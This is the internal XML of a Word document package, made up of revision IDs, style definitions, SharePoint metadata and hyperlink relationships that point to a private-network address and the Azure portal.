    <w:rsid w:val="4D5C7219"/>
    <w:rsid w:val="4DB370F2"/>
    <w:rsid w:val="4DBB3EF4"/>
    <w:rsid w:val="4DE3B4A8"/>
    <w:rsid w:val="4F4D6B1E"/>
    <w:rsid w:val="4F643F07"/>
    <w:rsid w:val="4F6FE57A"/>
    <w:rsid w:val="4F90841A"/>
    <w:rsid w:val="4FC78961"/>
    <w:rsid w:val="506A3941"/>
    <w:rsid w:val="5075F80E"/>
    <w:rsid w:val="50D18088"/>
    <w:rsid w:val="51BDA9A6"/>
    <w:rsid w:val="51DCD01D"/>
    <w:rsid w:val="51EF5282"/>
    <w:rsid w:val="51F30E48"/>
    <w:rsid w:val="52A629D9"/>
    <w:rsid w:val="52D6A112"/>
    <w:rsid w:val="53009F75"/>
    <w:rsid w:val="531B133A"/>
    <w:rsid w:val="532FA598"/>
    <w:rsid w:val="53EBE999"/>
    <w:rsid w:val="546120E5"/>
    <w:rsid w:val="54773D5A"/>
    <w:rsid w:val="5497D38F"/>
    <w:rsid w:val="54AC2767"/>
    <w:rsid w:val="54CA96F4"/>
    <w:rsid w:val="551AF0A2"/>
    <w:rsid w:val="554539D7"/>
    <w:rsid w:val="554DD232"/>
    <w:rsid w:val="55592017"/>
    <w:rsid w:val="55647AD8"/>
    <w:rsid w:val="565F04AE"/>
    <w:rsid w:val="566963A0"/>
    <w:rsid w:val="56FBC10F"/>
    <w:rsid w:val="5740D723"/>
    <w:rsid w:val="577F3DB6"/>
    <w:rsid w:val="57A3B635"/>
    <w:rsid w:val="58013B07"/>
    <w:rsid w:val="588E9ABD"/>
    <w:rsid w:val="5936C481"/>
    <w:rsid w:val="5974AA9C"/>
    <w:rsid w:val="59A8CD01"/>
    <w:rsid w:val="5A408E7C"/>
    <w:rsid w:val="5A6F2F11"/>
    <w:rsid w:val="5A975225"/>
    <w:rsid w:val="5AF92A5F"/>
    <w:rsid w:val="5BB40602"/>
    <w:rsid w:val="5BE71194"/>
    <w:rsid w:val="5BE94E30"/>
    <w:rsid w:val="5C849EE1"/>
    <w:rsid w:val="5C8F7451"/>
    <w:rsid w:val="5D8D99A9"/>
    <w:rsid w:val="5DE75DBF"/>
    <w:rsid w:val="5DEDD1CD"/>
    <w:rsid w:val="5DFEF2BB"/>
    <w:rsid w:val="5E0DBEAC"/>
    <w:rsid w:val="5E1249AA"/>
    <w:rsid w:val="5E55F281"/>
    <w:rsid w:val="5EEB138D"/>
    <w:rsid w:val="5F16F83B"/>
    <w:rsid w:val="5F481644"/>
    <w:rsid w:val="5F63BD19"/>
    <w:rsid w:val="5F9CDDDC"/>
    <w:rsid w:val="5FADEEE0"/>
    <w:rsid w:val="60173D13"/>
    <w:rsid w:val="602D160E"/>
    <w:rsid w:val="6093ECA7"/>
    <w:rsid w:val="6147B4E6"/>
    <w:rsid w:val="616DBC5F"/>
    <w:rsid w:val="61D8593E"/>
    <w:rsid w:val="61F4C8BF"/>
    <w:rsid w:val="627DBF15"/>
    <w:rsid w:val="628ACB71"/>
    <w:rsid w:val="6364C0B0"/>
    <w:rsid w:val="63A9CE44"/>
    <w:rsid w:val="63EFEDC0"/>
    <w:rsid w:val="64C2A67A"/>
    <w:rsid w:val="64E70F28"/>
    <w:rsid w:val="64E7FB6B"/>
    <w:rsid w:val="65645FAD"/>
    <w:rsid w:val="65CDAA04"/>
    <w:rsid w:val="65D1A189"/>
    <w:rsid w:val="65F8261C"/>
    <w:rsid w:val="65FBA30B"/>
    <w:rsid w:val="660DC37C"/>
    <w:rsid w:val="66A119E5"/>
    <w:rsid w:val="675B0E99"/>
    <w:rsid w:val="677204A7"/>
    <w:rsid w:val="6784FDF1"/>
    <w:rsid w:val="67D766BF"/>
    <w:rsid w:val="67F98F1B"/>
    <w:rsid w:val="683724F2"/>
    <w:rsid w:val="686F0D08"/>
    <w:rsid w:val="688A7827"/>
    <w:rsid w:val="68AD4DA3"/>
    <w:rsid w:val="69C23027"/>
    <w:rsid w:val="69D74C70"/>
    <w:rsid w:val="69DFE0A9"/>
    <w:rsid w:val="69F0FA37"/>
    <w:rsid w:val="6A077FBA"/>
    <w:rsid w:val="6A180A59"/>
    <w:rsid w:val="6A347714"/>
    <w:rsid w:val="6A7425DC"/>
    <w:rsid w:val="6A80BD1D"/>
    <w:rsid w:val="6ACDF0AF"/>
    <w:rsid w:val="6B0F713C"/>
    <w:rsid w:val="6B441611"/>
    <w:rsid w:val="6C2E9519"/>
    <w:rsid w:val="6D52C89D"/>
    <w:rsid w:val="6D6E569C"/>
    <w:rsid w:val="6D722155"/>
    <w:rsid w:val="6D902407"/>
    <w:rsid w:val="6E38BBBD"/>
    <w:rsid w:val="6F478F7B"/>
    <w:rsid w:val="6FEC109E"/>
    <w:rsid w:val="6FFBFE99"/>
    <w:rsid w:val="704A70B4"/>
    <w:rsid w:val="70810A5E"/>
    <w:rsid w:val="7099A66C"/>
    <w:rsid w:val="70D7B95A"/>
    <w:rsid w:val="70E48FC8"/>
    <w:rsid w:val="70F93AA8"/>
    <w:rsid w:val="70FBF9D2"/>
    <w:rsid w:val="7106E60B"/>
    <w:rsid w:val="71425BFF"/>
    <w:rsid w:val="7213C6F7"/>
    <w:rsid w:val="7226E11C"/>
    <w:rsid w:val="724DEC56"/>
    <w:rsid w:val="72DEC0B6"/>
    <w:rsid w:val="73525EAA"/>
    <w:rsid w:val="736C57C2"/>
    <w:rsid w:val="73D557DD"/>
    <w:rsid w:val="74920678"/>
    <w:rsid w:val="74F73A9A"/>
    <w:rsid w:val="7500EA72"/>
    <w:rsid w:val="751EAA27"/>
    <w:rsid w:val="75ADF22D"/>
    <w:rsid w:val="75BAFA2A"/>
    <w:rsid w:val="7668DC7D"/>
    <w:rsid w:val="7673D51E"/>
    <w:rsid w:val="76A10CC5"/>
    <w:rsid w:val="76BEC0DD"/>
    <w:rsid w:val="76E98600"/>
    <w:rsid w:val="7713956B"/>
    <w:rsid w:val="777F8EF4"/>
    <w:rsid w:val="77EED252"/>
    <w:rsid w:val="78905749"/>
    <w:rsid w:val="7930AB0C"/>
    <w:rsid w:val="796F9FFE"/>
    <w:rsid w:val="7977A849"/>
    <w:rsid w:val="79E81370"/>
    <w:rsid w:val="7A06A5CF"/>
    <w:rsid w:val="7A07C440"/>
    <w:rsid w:val="7A509805"/>
    <w:rsid w:val="7A75B702"/>
    <w:rsid w:val="7AB78BEB"/>
    <w:rsid w:val="7AB7E77A"/>
    <w:rsid w:val="7AFB69D0"/>
    <w:rsid w:val="7B001463"/>
    <w:rsid w:val="7B7596CC"/>
    <w:rsid w:val="7C00C3D3"/>
    <w:rsid w:val="7C3F0917"/>
    <w:rsid w:val="7C482B31"/>
    <w:rsid w:val="7C6B58AC"/>
    <w:rsid w:val="7C79FB94"/>
    <w:rsid w:val="7D69DDA4"/>
    <w:rsid w:val="7E033099"/>
    <w:rsid w:val="7E2E2490"/>
    <w:rsid w:val="7EC1AF75"/>
    <w:rsid w:val="7EF7A2B5"/>
    <w:rsid w:val="7FE7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1A1EE"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{5977DD48-069D-42A8-A68E-9D0F30D2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E149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1E149EC1"/>
    <w:rPr>
      <w:color w:val="467886"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="7668DC7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7668DC7D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3.pn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2.pn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microsoft.com/office/2020/10/relationships/intelligence" Target="intelligence2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1.png" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.0.0.6:8080" TargetMode="External" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.portal.azure.com/" TargetMode="External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://10.0.0.6" TargetMode="External" Id="R5e167d144ddc4558" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.0.0.6:8080" TargetMode="External" Id="R24bbbba893d146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0936C6299CC945A440E6256FF0817C" ma:contentTypeVersion="11" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="6cc8aa43c0abead3a5b746344b7cf2d8">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="ea9099c5-5f58-4d5f-bbbc-cf88abc9785e" xmlns:ns3="3df9c562-aa2d-499d-8c30-af821e77f1c6" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="db8c2c5290174ff4fe476c965db87245" ns2:_="" ns3:_="">
    <xsd:import namespace="ea9099c5-5f58-4d5f-bbbc-cf88abc9785e"/>
    <xsd:import namespace="3df9c562-aa2d-499d-8c30-af821e77f1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099c5-5f58-4d5f-bbbc-cf88abc978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8f35150-8fcb-4f90-b53e-d8f5d6732e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9c562-aa2d-499d-8c30-af821e77f1c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19b348c-2055-41ba-a0f5-d7cb71dd49a7}" ma:internalName="TaxCatchAll" ma:showField="CatchAllData" ma:web="3df9c562-aa2d-499d-8c30-af821e77f1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a9099c5-5f58-4d5f-bbbc-cf88abc9785e">
      <Terms xmlns="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    </lcf76f155ced4ddcb4097134ff3c332f>
    <TaxCatchAll xmlns="3df9c562-aa2d-499d-8c30-af821e77f1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1A0104-9611-4DB0-8CF9-73C2E87A53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9099c5-5f58-4d5f-bbbc-cf88abc9785e"/>
    <ds:schemaRef ds:uri="3df9c562-aa2d-499d-8c30-af821e77f1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71F2B8-02B9-447C-878E-88FC7F2B6C00}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <ds:schemaRef ds:uri="ea9099c5-5f58-4d5f-bbbc-cf88abc9785e"/>
    <ds:schemaRef ds:uri="3df9c562-aa2d-499d-8c30-af821e77f1c6"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{B2BD60F5-17FE-487D-8901-33FD0CC9E66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Darryl</dc:creator>
  <keywords/>
  <dc:description/>
  <lastModifiedBy>Darryl</lastModifiedBy>
  <revision>9</revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-03-12T20:13:00.0000000Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-04-11T01:56:27.6825232Z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0x0101009F0936C6299CC945A440E6256FF0817C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MediaServiceImageTags">
    <vt:lpwstr/>
  </property>
</Properties>
</file>